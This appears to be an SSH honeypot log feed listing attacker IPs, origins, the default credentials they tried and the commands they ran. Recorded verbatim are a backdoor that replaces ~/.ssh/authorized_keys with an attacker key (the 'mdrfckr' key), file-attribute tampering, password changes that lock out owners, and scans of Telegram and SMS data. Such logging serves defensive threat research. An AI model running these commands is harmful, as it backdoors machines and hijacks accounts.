$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ venomous_clog_root (45.156.87.13) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-22 19:18 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ wired_phantom_root (91.92.40.151) โ€” Varna, Bulgaria ยท 31 sessions ยท 31 cmds
2026-06-22 16:57 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ weary_stroopwafel_root (176.65.139.181) โ€” Eygelshoven, The Netherlands ยท 3 sessions ยท 3 cmds
2026-06-21 10:58 EDT ยท as root/123456, root/root
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—3
๐ŸŽญ crimson_chateau_root_232 (51.75.247.232) โ€” Roubaix, France ยท 1 session ยท 2 cmds
2026-06-22 15:24 EDT ยท as oracle/oracle@123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ glitchy_windmill_root (52.233.193.61) โ€” Amsterdam, Netherlands ยท 1 session ยท 2 cmds
2026-06-22 14:53 EDT ยท as oracle/oracle@123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ brisk_gouda_root (176.65.132.129) โ€” Eygelshoven, The Netherlands ยท 128 sessions ยท 128 cmds
2026-05-16 07:57 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 35x across 35 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—128
๐ŸŽญ jittery_echo_root (91.92.40.231) โ€” Varna, Bulgaria ยท 3 sessions ยท 12 cmds
2026-06-22 13:30 EDT ยท as admin/123456, admin/admin123, admin/password
export โ†’ uname โ†’ cat
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—3
$ uname -s -v -n -m 2 > /dev/null ร—3
$ uname -m 2 > /dev/null ร—3
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—3
๐ŸŽญ ironclad_dutch_sol (80.94.92.184) โ€” Amsterdam, The Netherlands ยท 37 sessions ยท 37 cmds
2026-05-08 06:37 EDT ยท as sol/123456, sol/sol, solana/solana
Ran uname 111x across 111 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—37
โ†ณ obfuscated system check
๐ŸŽญ weary_batik_root (8.215.85.137) โ€” Jakarta, Indonesia ยท 1 session ยท 1 cmd
2026-06-22 10:08 EDT ยท as root/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ derelict_specter_sol (91.92.40.48) โ€” Varna, Bulgaria ยท 27 sessions ยท 27 cmds
2026-06-22 05:03 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ zealous_clog_root (176.65.139.215) โ€” Eygelshoven, The Netherlands ยท 31 sessions ยท 31 cmds
2026-06-22 04:30 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—31
๐ŸŽญ vapor_jade_13 (8.148.228.13) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-06-22 04:12 EDT ยท as test/test
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ vapor_cossack_root (159.224.132.77) โ€” Kyiv, Ukraine ยท 1 session ยท 9 cmds
2026-06-22 03:48 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ feral_cipher_root (197.243.14.52) โ€” Kigali, Rwanda ยท 1 session ยท 20 cmds
2026-06-22 00:40 EDT ยท as admin/asdf1234
cd ~; chattr -ia .ssh; lockr -ia .ssh โ†’ cd ~ && rm -rf .ssh && mkdir .ssh โ†’ echo "ssh-rsa..." โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo "asdf1234\nBCLy8cisyi8u"|passwd|bash โ†’ Enter new UNIX password: โ†’ echo
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "asdf1234\nBCLy8cisyi8u\nBCLy8cisyi8u"|passwd|bash
$ Enter new UNIX password:
$ echo "asdf1234\nBCLy8cisyi8u\nBCLy8cisyi8u\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ jittery_gouda_sol (80.94.92.182) โ€” Amsterdam, The Netherlands ยท 40 sessions ยท 40 cmds
2026-05-19 12:09 EDT ยท as firedancer/firedancer, raydium/raydium, sol/123
Ran uname 58x across 58 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—40
โ†ณ obfuscated system check
๐ŸŽญ lurking_stein_root (104.238.177.164) โ€” Frankfurt am Main, Germany ยท 1 session ยท 20 cmds
2026-06-21 23:43 EDT ยท as oracle/welcome123
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "welcome123\n1qYzLS8AwEXz\n1qYzLS8AwEXz"|passwd|bash
$ Enter new UNIX password:
$ echo "welcome123\n1qYzLS8AwEXz\n1qYzLS8AwEXz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ derelict_kimchi_root (112.216.108.62) โ€” Yongin-si, South Korea ยท 1 session ยท 2 cmds
2026-06-21 23:18 EDT ยท as oracle/Passw0rd@123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ haywire_volcano_root (34.128.111.153) โ€” Jakarta, Indonesia ยท 12 sessions ยท 12 cmds
2026-06-21 22:31 EDT ยท as admin/123456, admin/admin, admin/password
echo (repeated echo 12x)
$ echo SHELL_TEST ร—12
๐ŸŽญ crimson_jeepney_root (8.220.180.66) โ€” Manila, Philippines ยท 1 session ยท 1 cmd
2026-06-21 21:57 EDT ยท as root/root
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ savage_tulip_sol (91.92.42.7) โ€” Amsterdam, The Netherlands ยท 28 sessions ยท 28 cmds
2026-06-21 17:01 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—28
๐ŸŽญ vapor_silk (47.104.241.152) โ€” Qingdao, China ยท 1 session ยท 1 cmd
2026-06-21 10:40 EDT ยท as user/password
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ savage_lantern_root_1 (47.104.232.1) โ€” Qingdao, China ยท 1 session ยท 1 cmd
2026-06-21 10:23 EDT ยท as pi/pi
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ savage_dutch_sol (80.94.92.168) โ€” Amsterdam, The Netherlands ยท 30 sessions ยท 30 cmds
2026-05-07 04:36 EDT ยท as solana/solana
Ran uname 76x across 76 sessions โ€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m ร—30
โ†ณ obfuscated system check
๐ŸŽญ silent_nomad_root (45.15.226.44) โ€” Chisinau, Moldova ยท 1 session ยท 9 cmds
2026-06-21 05:49 EDT ยท as root/root
/root login via root/root โ†’ network interface audit (ifconfig) โ†’ OS fingerprinting (uname -a, /proc/cpuinfo) โ†’ cryptomining scan (ps grep miner) โ†’ Telegram data directory enumeration (/home/*/.local/share/TelegramDesktop/tdata) โ†’ failed device locate attempt (D877F783D5D3EF8Cs) โ†’ benign echo output
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ zealous_peak_root (103.116.247.163) โ€” Sheung Wan, Hong Kong ยท 1 session ยท 1 cmd
2026-06-21 02:27 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -m
๐ŸŽญ placid_beefeater_root (8.208.16.103) โ€” London, United Kingdom ยท 1 session ยท 1 cmd
2026-06-20 23:51 EDT ยท as admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ obsidian_peak_root (119.28.9.170) โ€” Hong Kong, Hong Kong ยท 1 session ยท 20 cmds
2026-06-20 23:33 EDT ยท as ubuntu/password
cd ~; chattr -ia .ssh โ†’ rm -rf .ssh โ†’ mkdir .ssh โ†’ echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" โ†’ cat /proc/cpuinfo | grep name | wc -l โ†’ echo -e "password\n8
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo -e "password\n8tbPTgIRUGFy\n8tbPTgIRUGFy"|passwd|bash
$ Enter new UNIX password:
$ echo "password\n8tbPTgIRUGFy\n8tbPTgIRUGFy\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ wily_panda_root_204 (39.105.26.204) โ€” Beijing, China ยท 1 session ยท 1 cmd
2026-06-20 23:05 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ scrappy_shogun_root (43.165.186.97) โ€” Tokyo, Japan ยท 2 sessions ยท 2 cmds
2026-05-16 01:22 EDT ยท as admin/admin, root/12345678
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ aloof_stroopwafel_root (176.65.132.24) โ€” Eygelshoven, The Netherlands ยท 97 sessions ยท 97 cmds
2026-05-14 00:58 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 35x across 35 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—97
๐ŸŽญ manic_clog_root (45.156.87.254) โ€” Eygelshoven, The Netherlands ยท 62 sessions ยท 62 cmds
2026-06-13 02:49 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 2x across 2 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—62
๐ŸŽญ midnight_jade_root_57 (106.53.88.57) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-06-20 20:21 EDT ยท as root/1234
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ murky_dimsum (103.49.62.60) โ€” Kwun Tong, Hong Kong ยท 2 sessions ยท 2 cmds
2026-05-10 18:14 EDT ยท as guest/guest
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a ร—2
โ†ณ OS/kernel identification
๐ŸŽญ wired_llanero_root (200.71.154.142) โ€” Caracas, Venezuela ยท 3 sessions ยท 27 cmds
2026-06-20 14:58 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print ร—3
$ ifconfig ร—3
โ†ณ network mapping
$ uname -a ร—3
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo ร—3
โ†ณ CPU profiling
$ ps | grep '[Mm]iner' ร—3
$ ps -ef | grep '[Mm]iner' ร—3
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ร—3
$ locate D877F783D5D3EF8Cs ร—3
$ echo Hi | cat -n ร—3
๐ŸŽญ brazen_hawker_db (43.160.237.65) โ€” Singapore, Singapore ยท 1 session ยท 1 cmd
2026-06-20 14:56 EDT ยท as oracle/oracle
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ stoic_lantern_root (119.23.73.148) โ€” Shenzhen, China ยท 1 session ยท 1 cmd
2026-06-20 14:47 EDT ยท as root/123456
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ wily_blitz_root_224 (64.226.126.224) โ€” Frankfurt am Main, Germany ยท 1 session ยท 9 cmds
2026-06-20 12:01 EDT ยท as root/root
network mapping โ†’ OS/kernel identification โ†’ CPU profiling
$ /ip cloud print
$ ifconfig
โ†ณ network mapping
$ uname -a
โ†ณ OS/kernel identification
$ cat /proc/cpuinfo
โ†ณ CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
๐ŸŽญ grumpy_phantom_root (91.92.40.5) โ€” Varna, Bulgaria ยท 19 sessions ยท 76 cmds
2026-06-20 07:58 EDT ยท as admin/123456, admin/admin, admin/password
export โ†’ uname โ†’ cat
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—19
$ uname -s -v -n -m 2 > /dev/null ร—19
$ uname -m 2 > /dev/null ร—19
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—19
๐ŸŽญ sullen_star_root (141.11.88.5) โ€” Crugers, United States ยท 27 sessions ยท 27 cmds
2026-06-20 07:52 EDT ยท as admin/123456, admin/admin, admin/admin123
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—27
๐ŸŽญ clandestine_seoul_root (58.224.62.29) โ€” Gangseo-gu, South Korea ยท 1 session ยท 2 cmds
2026-06-20 09:29 EDT ยท as oracle/adminadmin
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rogue_crepe_root (176.191.43.176) โ€” Villefranche-sur-Saรดne, France ยท 1 session ยท 2 cmds
2026-06-20 09:27 EDT ยท as oracle/adminadmin
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ frantic_hanbok_root (49.247.36.49) โ€” Gwangmyeong, South Korea ยท 1 session ยท 2 cmds
2026-06-20 09:27 EDT ยท as oracle/adminadmin
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ wired_dimsum_root (47.76.36.75) โ€” Hong Kong, Hong Kong ยท 1 session ยท 1 cmd
2026-06-20 08:17 EDT ยท as postgres/postgres
